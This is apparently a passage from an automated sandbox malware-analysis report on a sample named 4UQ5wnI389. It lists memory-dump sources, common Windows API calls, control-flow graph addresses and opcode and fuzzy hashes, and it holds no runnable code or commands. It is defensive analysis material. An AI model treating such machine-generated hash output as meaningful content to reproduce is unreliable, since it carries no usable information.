                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0f73158318d26de081238998ac9ddb12a3b59e663e6c5b6707038ef894a52c76
                                                                                                            • Instruction ID: 8eb556b12ba73ef31f1939194dd8e2d8e10154a0f3d8c6ee73017a0a774f964a
                                                                                                            • Opcode Fuzzy Hash: 0f73158318d26de081238998ac9ddb12a3b59e663e6c5b6707038ef894a52c76
                                                                                                            • Instruction Fuzzy Hash: 8841E2B4E01248CBEB18CFAAD9546DEBBF2AF89304F20D12AD418BB254EB355945CF54

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 381809FE
                                                                                                            • GetCurrentThread.KERNEL32 ref: 38180A3B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 38180A78
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 38180AD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2746168269.0000000038180000.00000040.00000800.00020000.00000000.sdmp, Offset: 38180000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_38180000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: 43a148c8cdf75fe5e90f7350b9fcb0543fd64ec054d38eedfe7e04c5d98a1ce2
                                                                                                            • Instruction ID: 21384c66a9caf067a9e59c3beaf0b16eb0b2e58d594b05b602fa8e1c8dcea828
                                                                                                            • Opcode Fuzzy Hash: 43a148c8cdf75fe5e90f7350b9fcb0543fd64ec054d38eedfe7e04c5d98a1ce2
                                                                                                            • Instruction Fuzzy Hash: BD5154B0905749DFDB04CFAAD549BEEBBF1AF88300F24845AE419A7261D7345941CF62

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 381809FE
                                                                                                            • GetCurrentThread.KERNEL32 ref: 38180A3B
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 38180A78
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 38180AD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2746168269.0000000038180000.00000040.00000800.00020000.00000000.sdmp, Offset: 38180000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_38180000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: 5aaf7dd3ac3e4a9d74da130e7f6e25c72c0439c43bad7548b61b0aefbfef0b34
                                                                                                            • Instruction ID: 007ceae792821e70120e79b7c896e5ee48f8076cfba4cfa14d5ba3c3bdc73d85
                                                                                                            • Opcode Fuzzy Hash: 5aaf7dd3ac3e4a9d74da130e7f6e25c72c0439c43bad7548b61b0aefbfef0b34
                                                                                                            • Instruction Fuzzy Hash: 9C5133B0901749DFEB04CFAAD549BEEBBF1AF88310F20845AE419A7361D7349941CF66

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1536 38180104-38180108 1537 3818010a-3818014b 1536->1537 1538 3818014e-38180176 1536->1538 1537->1538 1539 38180178-3818017e 1538->1539 1540 38180181-38180188 1538->1540 1539->1540 1541 3818018a-38180190 1540->1541 1542 38180193-38180232 CreateWindowExW 1540->1542 1541->1542 1544 3818023b-38180273 1542->1544 1545 38180234-3818023a 1542->1545 1549 38180280 1544->1549 1550 38180275-38180278 1544->1550 1545->1544 1551 38180281 1549->1551 1550->1549 1551->1551
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 38180222
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2746168269.0000000038180000.00000040.00000800.00020000.00000000.sdmp, Offset: 38180000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_38180000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 321194b55635f6789722836b3d2b5dd740fe6fdd54e1dbf9aa0c06f78cf5162a
                                                                                                            • Instruction ID: a7d236e325cadf710b373403f3278b8f9db746dcd6f8a8481ad12e6994bf6c82
                                                                                                            • Opcode Fuzzy Hash: 321194b55635f6789722836b3d2b5dd740fe6fdd54e1dbf9aa0c06f78cf5162a
                                                                                                            • Instruction Fuzzy Hash: BD51E2B1D00349DFDB14CFA9D885ADEBBB2FF48310F24852AE419AB210D7719941CF90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1552 38180110-38180176 1554 38180178-3818017e 1552->1554 1555 38180181-38180188 1552->1555 1554->1555 1556 3818018a-38180190 1555->1556 1557 38180193-38180232 CreateWindowExW 1555->1557 1556->1557 1559 3818023b-38180273 1557->1559 1560 38180234-3818023a 1557->1560 1564 38180280 1559->1564 1565 38180275-38180278 1559->1565 1560->1559 1566 38180281 1564->1566 1565->1564 1566->1566
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 38180222
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2746168269.0000000038180000.00000040.00000800.00020000.00000000.sdmp, Offset: 38180000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_38180000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 6e9f20fdb02195661b3b8850013edfe2e95b18d8ad2125ae4c2d408cb9fecec9
                                                                                                            • Instruction ID: 5d3f36767a7f14b752bb4b491d8125046ff906334db212d9d67c0a60561434ff
                                                                                                            • Opcode Fuzzy Hash: 6e9f20fdb02195661b3b8850013edfe2e95b18d8ad2125ae4c2d408cb9fecec9
                                                                                                            • Instruction Fuzzy Hash: 8741C0B5D00349DFDB14CFAAD881ADEFBB5BF48310F24812AE819AB210D7759941CF90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1567 38181854-38181dfc 1570 38181eac-38181ecc 1567->1570 1571 38181e02-38181e07 1567->1571 1578 38181ecf-38181edc 1570->1578 1572 38181e09-38181e40 1571->1572 1573 38181e5a-38181e92 CallWindowProcW 1571->1573 1581 38181e49-38181e58 1572->1581 1582 38181e42-38181e48 1572->1582 1575 38181e9b-38181eaa 1573->1575 1576 38181e94-38181e9a 1573->1576 1575->1578 1576->1575 1581->1578 1582->1581
                                                                                                            APIs
                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 38181E81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2746168269.0000000038180000.00000040.00000800.00020000.00000000.sdmp, Offset: 38180000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_38180000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714655100-0
                                                                                                            • Opcode ID: 68295d5dd8dba7decea5b439606bb605bf2710eae1e8a5610ff7c346f6808ad0
                                                                                                            • Instruction ID: 6d16217c13a466dee167d53acbe0bf901c20041dbad3e6cc92933fdcd92a8b25
                                                                                                            • Opcode Fuzzy Hash: 68295d5dd8dba7decea5b439606bb605bf2710eae1e8a5610ff7c346f6808ad0
                                                                                                            • Instruction Fuzzy Hash: CB4137B9900309DFDB51CF99C485E9ABBF5FB88310F258859E518AB321D734A841CFA1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1584 38180bc1-38180c5c DuplicateHandle 1586 38180c5e-38180c64 1584->1586 1587 38180c65-38180c82 1584->1587 1586->1587
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 38180C4F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2746168269.0000000038180000.00000040.00000800.00020000.00000000.sdmp, Offset: 38180000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_38180000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: cec197d909cfc732f08f340d338f60c837a2dad340ba4d7e03dfc8c7beeeca73
                                                                                                            • Instruction ID: ad570adeedf2b1dc3e7ea3c6140bc7420127b9782bc61dc50d5316d685d96a1f
                                                                                                            • Opcode Fuzzy Hash: cec197d909cfc732f08f340d338f60c837a2dad340ba4d7e03dfc8c7beeeca73
                                                                                                            • Instruction Fuzzy Hash: 1821E7B5900348DFDB10CFAAD984ADEBBF8EB48320F14845AE915A7310D374A955CFA5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1590 38180bc8-38180c5c DuplicateHandle 1591 38180c5e-38180c64 1590->1591 1592 38180c65-38180c82 1590->1592 1591->1592
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 38180C4F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2746168269.0000000038180000.00000040.00000800.00020000.00000000.sdmp, Offset: 38180000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_38180000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 0613629a577530dfe5353ae29d22052408a74506327476222ee65732bf51950f
                                                                                                            • Instruction ID: b0977a607505a805ec7167a4780abc34201230c06ed2800621ca6fb01ba68b01
                                                                                                            • Opcode Fuzzy Hash: 0613629a577530dfe5353ae29d22052408a74506327476222ee65732bf51950f
                                                                                                            • Instruction Fuzzy Hash: 0B21C4B5900348EFDB10CFAAD985ADEFBF4EB48320F14845AE958A7350D374A950CF65

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1607 3818d4c8-3818d532 OleInitialize 1608 3818d53b-3818d558 1607->1608 1609 3818d534-3818d53a 1607->1609 1609->1608
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 3818D525
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2746168269.0000000038180000.00000040.00000800.00020000.00000000.sdmp, Offset: 38180000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_38180000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: 98c985ed418d10e53f97b9a76012c70959bd4d896c118fa642221242ffc74df5
                                                                                                            • Instruction ID: 9ed95cbd207979bf816704d10d515142cb502aa3abbfbe1c643e902c6f3f0fb2
                                                                                                            • Opcode Fuzzy Hash: 98c985ed418d10e53f97b9a76012c70959bd4d896c118fa642221242ffc74df5
                                                                                                            • Instruction Fuzzy Hash: CF1133B5800788DFDB20CFAAD445BDEBFF4AB48224F24845ED419A7300C374A945CFA6

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1612 38182019-3818208a SetTimer 1613 3818208c-38182092 1612->1613 1614 38182093-381820a7 1612->1614 1613->1614
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2746168269.0000000038180000.00000040.00000800.00020000.00000000.sdmp, Offset: 38180000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_38180000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Timer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2870079774-0
                                                                                                            • Opcode ID: d0809c129a0df4c4c319893c729ab4fd95fd76422ff32d6909aef0a448ece7e7
                                                                                                            • Instruction ID: c2391705c2298fd7dc7e168066af1aa1fcab54d0d6d99d912793afb1528baca7
                                                                                                            • Opcode Fuzzy Hash: d0809c129a0df4c4c319893c729ab4fd95fd76422ff32d6909aef0a448ece7e7
                                                                                                            • Instruction Fuzzy Hash: 2A1122B5900648DFDB10CFAAD485BDEFBF4EB48320F10841AD459A7740C375A944CFA1
                                                                                                            APIs
                                                                                                            • OleInitialize.OLE32(00000000), ref: 3818D525
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2746168269.0000000038180000.00000040.00000800.00020000.00000000.sdmp, Offset: 38180000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_38180000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2538663250-0
                                                                                                            • Opcode ID: b4103944dfc3a9ebf6613b09e55e22245cee9decfe832de58d904142c0e0faaf
                                                                                                            • Instruction ID: 6e58fead2ac9c85a53cdb744f6e8cb58dc47c356e9957d98282b3b549d9bc2e0
                                                                                                            • Opcode Fuzzy Hash: b4103944dfc3a9ebf6613b09e55e22245cee9decfe832de58d904142c0e0faaf
                                                                                                            • Instruction Fuzzy Hash: 2E1112B6904748CFDB20CFAAD445B9EFBF4EB48224F20845AE519A7700C379A944CFA5
                                                                                                            APIs
                                                                                                            • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,3818DA0F), ref: 3818E845
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2746168269.0000000038180000.00000040.00000800.00020000.00000000.sdmp, Offset: 38180000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_38180000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DispatchMessage
                                                                                                            • String ID:
                                                                                                            • API String ID: 2061451462-0
                                                                                                            • Opcode ID: 46dc94ab8456395284502b3eb2f0479474479b843ffa704f3d7b9db7a86de253
                                                                                                            • Instruction ID: a582237915df26fd4a6cc3f6b36fff5f6584b3a5e6fbeb39df798047f507e9c5
                                                                                                            • Opcode Fuzzy Hash: 46dc94ab8456395284502b3eb2f0479474479b843ffa704f3d7b9db7a86de253
                                                                                                            • Instruction Fuzzy Hash: 321110B1C00648CFDB20CF9AD444B9EFBF4EB48220F10842AE518A3210C378A940CFA6
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2746168269.0000000038180000.00000040.00000800.00020000.00000000.sdmp, Offset: 38180000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_38180000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Timer
                                                                                                            • String ID:
                                                                                                            • API String ID: 2870079774-0
                                                                                                            • Opcode ID: e780ec3422bef1e5290b8eec8f7358161f2a0916be1fd8785f61cb223820dfdf
                                                                                                            • Instruction ID: a10f6151bd8706f9d1fe4b5f699e4627e32fe97cfd7db35b9c19dc22c8b44cf0
                                                                                                            • Opcode Fuzzy Hash: e780ec3422bef1e5290b8eec8f7358161f2a0916be1fd8785f61cb223820dfdf
                                                                                                            • Instruction Fuzzy Hash: 0611D3B5800749DFDB10CFAAD445BDEFBF8EB48320F10841AE559A7250C375A944CFA1
                                                                                                            APIs
                                                                                                            • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,3818DA0F), ref: 3818E845
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2746168269.0000000038180000.00000040.00000800.00020000.00000000.sdmp, Offset: 38180000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_38180000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DispatchMessage
                                                                                                            • String ID:
                                                                                                            • API String ID: 2061451462-0
                                                                                                            • Opcode ID: de3ee821d886620a08b45eddd532a73cecd20b5e62b25efb425f94a53d854f27
                                                                                                            • Instruction ID: 11908ec428acea4a15d334b69ab5984b9c1841c4444c610288d1fa19246a15bc
                                                                                                            • Opcode Fuzzy Hash: de3ee821d886620a08b45eddd532a73cecd20b5e62b25efb425f94a53d854f27
                                                                                                            • Instruction Fuzzy Hash: AD11E0B5C00649CFCB10CFAAD544BDEBBF4AB48314F14845AE459A7610C378A545CFA6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 4X;^
                                                                                                            • API String ID: 0-2766785150
                                                                                                            • Opcode ID: 7b27e431be4fa7d99cf40dcb4c30e468ad01cd93952829db920326ff03e35c2e
                                                                                                            • Instruction ID: 5e87f9eb5fb8fec9ca80f91d1177c2dfcc60b147b1dc7aa84c46e8b9f23127c4
                                                                                                            • Opcode Fuzzy Hash: 7b27e431be4fa7d99cf40dcb4c30e468ad01cd93952829db920326ff03e35c2e
                                                                                                            • Instruction Fuzzy Hash: AD515C70A042499FCB05DFA8D495AEEBBB2FF89300F108569D005BB362DB35AD41CF91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4fc1254672dfeeb3557095b585ad0148f481f84a66aca8a9fc52b7abaf495b7f
                                                                                                            • Instruction ID: 05a6589e03470109a9069d9f5a288d60cb1ac912d6153fc0199aab5e8778bfee
                                                                                                            • Opcode Fuzzy Hash: 4fc1254672dfeeb3557095b585ad0148f481f84a66aca8a9fc52b7abaf495b7f
                                                                                                            • Instruction Fuzzy Hash: B752FE34A00218CFEB24DBE4D861BAEBB72EF88301F1081A9D51A6B395DF355E85DF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 24e1cdac5942fe33101dc072a4ee755cb4cf5342d8c2e2ddaa3eb19720783123
                                                                                                            • Instruction ID: cd641099139cf389b83264df6ad76588406ed308cc709392390e778404d9a3f1
                                                                                                            • Opcode Fuzzy Hash: 24e1cdac5942fe33101dc072a4ee755cb4cf5342d8c2e2ddaa3eb19720783123
                                                                                                            • Instruction Fuzzy Hash: 9D42D9A7E1D7E18FC7124B705CB82597FB17B22106BEE458ED8C297283EBA94485C353
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 48dda29c72760ef5765bd22e8a203ef1c64dac2ba8d952a1241208ac2adc1cb1
                                                                                                            • Instruction ID: 1e726fe38e284da52e3972ce4ade88ec5bf7a2b6c7158efd7451e5fe3f73d9ec
                                                                                                            • Opcode Fuzzy Hash: 48dda29c72760ef5765bd22e8a203ef1c64dac2ba8d952a1241208ac2adc1cb1
                                                                                                            • Instruction Fuzzy Hash: ED126B30A00209CFCB14CFA9D984A9EBBF2FF88315F558559E869DB261DB30ED45CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 291392359a253065cab30119c5eb1505adf16869c4816941ff7fc5b0dc394f25
                                                                                                            • Instruction ID: ccde11bb13fc6d9afdfc4e54c02ad577a122753884b34825a608fb37ed101491
                                                                                                            • Opcode Fuzzy Hash: 291392359a253065cab30119c5eb1505adf16869c4816941ff7fc5b0dc394f25
                                                                                                            • Instruction Fuzzy Hash: ADB1B030304610CFDB159F38C868B6A7BA6AF89306F158569E816CF391CB74CC89DB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: feea920de123621713b060e16987791b1aaaea337f06ad6b3c0a7ec55656e6e9
                                                                                                            • Instruction ID: 54db9f337c1b9f55356156c78e4a88479d89a4453b184254fd3099abe8492021
                                                                                                            • Opcode Fuzzy Hash: feea920de123621713b060e16987791b1aaaea337f06ad6b3c0a7ec55656e6e9
                                                                                                            • Instruction Fuzzy Hash: 27E1B274A00268CFDB25DFA4D894BADB7B2EB89305F5085A9D80A77390CB355E82DF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2745908912.0000000037B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_37b10000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e37a385491de1b19076e37dced1c54fdabbd517cee5cd3065769a35d6d10751d
                                                                                                            • Instruction ID: 7b2182729e3005bc7e908a3632b22cb5af850ac7973b8cdb2322f04f479901ad
                                                                                                            • Opcode Fuzzy Hash: e37a385491de1b19076e37dced1c54fdabbd517cee5cd3065769a35d6d10751d
                                                                                                            • Instruction Fuzzy Hash: 37E1B234A00268CFDB25DFA4D894BADB7B2EB89305F5085A9D80A77390CF355E82DF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8fa99de38a1b07ed316054bfb89756cf1aeea9999c99ae539da9dacb7121c90e
                                                                                                            • Instruction ID: e7ff8b451c5674a55f477a7085d82caeffee2836580697196d57b349c39ca3e9
                                                                                                            • Opcode Fuzzy Hash: 8fa99de38a1b07ed316054bfb89756cf1aeea9999c99ae539da9dacb7121c90e
                                                                                                            • Instruction Fuzzy Hash: 98818130B00945CFCB18CF69C4A49AAB7B3BF88316B658169D826DF365E731EC45CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2ad564184d38c6f6420ec8060716817dccf33cd23bcd8a237503107ecb49fcd5
                                                                                                            • Instruction ID: 8a6562f06d573c0d007fdaa7345f32c883cb7b9498cbbf21f676f6579e56e89c
                                                                                                            • Opcode Fuzzy Hash: 2ad564184d38c6f6420ec8060716817dccf33cd23bcd8a237503107ecb49fcd5
                                                                                                            • Instruction Fuzzy Hash: 8BA1C574A10249CFDB05DFE8E884ADDBBB1FB88705B105629E415AB365EB706D46CFC0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 74104939b82ba27a783785e942242ba9889c71c2412c10779dbefba39ef32e44
                                                                                                            • Instruction ID: 5468a574fbabadd1926f8334f0c9b04b0a7d1fe07d5030e278db88e376deea64
                                                                                                            • Opcode Fuzzy Hash: 74104939b82ba27a783785e942242ba9889c71c2412c10779dbefba39ef32e44
                                                                                                            • Instruction Fuzzy Hash: 8C711434700205CFCB14DF68C895A6A7BF6EF49702B5944A9E826CB3B1DB74EC85CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c52f25c3f5ad29ebeaa9c7fb642ff74311750e5a4c559732a74c4baed28a9ae6
                                                                                                            • Instruction ID: da8a7d8402c0d2d58d80cafce3bff3e0a28708b5fa26863e6f92b469c3a4aca7
                                                                                                            • Opcode Fuzzy Hash: c52f25c3f5ad29ebeaa9c7fb642ff74311750e5a4c559732a74c4baed28a9ae6
                                                                                                            • Instruction Fuzzy Hash: 1A719131608655CFC715CF28C8D8A6A7BB1FF46312B168499FC699F2A2C731EC49CB91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ee592be964f230ed3737fc4319f974c40c76c5d5bedf500d70471db8dbd1466f
                                                                                                            • Instruction ID: 138c005ba830f77bc2239ea61a12f0019fb1c2849835ac1b3b738f2c3d8fb1d0
                                                                                                            • Opcode Fuzzy Hash: ee592be964f230ed3737fc4319f974c40c76c5d5bedf500d70471db8dbd1466f
                                                                                                            • Instruction Fuzzy Hash: 43A1C574A10249CFDB04DFE8E884ADDBBB6FB88705B105629E415AB365EB706D46CFC0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 12b4a26e3772ce7aad8162da478296a807a0957a3758ca8629bdbbac0144626b
                                                                                                            • Instruction ID: 83e591b1eb387d08ecc592cd2f00b1658621d8dae2c7f1bcc4164693fb6c83f2
                                                                                                            • Opcode Fuzzy Hash: 12b4a26e3772ce7aad8162da478296a807a0957a3758ca8629bdbbac0144626b
                                                                                                            • Instruction Fuzzy Hash: 59711930605245CFC711CF28D8805AABBF5FF45312B1585AAD865EF362D731ED1ACBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717670092.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_150000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
